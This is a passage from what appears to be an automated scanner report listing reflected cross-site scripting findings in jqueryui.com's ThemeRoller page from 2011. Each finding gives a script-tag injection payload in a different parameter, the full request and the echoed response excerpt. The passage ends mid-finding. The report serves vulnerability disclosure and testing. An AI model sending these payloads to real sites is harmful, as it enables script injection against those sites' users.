The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c7b8"><script>alert(1)</script>81f4ae42993 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8e9"><script>alert(1)</script>bc1b48b47cf was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c7"><script>alert(1)</script>22b07013f0d was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconCo
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3477"><script>alert(1)</script>00ee690a072 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=4
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a648"><script>alert(1)</script>1c587b6ed83 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b7"><script>alert(1)</script>1e318d1330f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6071a"><script>alert(1)</script>90cbce80a0e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d510"><script>alert(1)</script>ecb5ac790e0 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=4
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5155"><script>alert(1)</script>7fc8fd270e6 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5153"><script>alert(1)</script>c40354ad18f was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

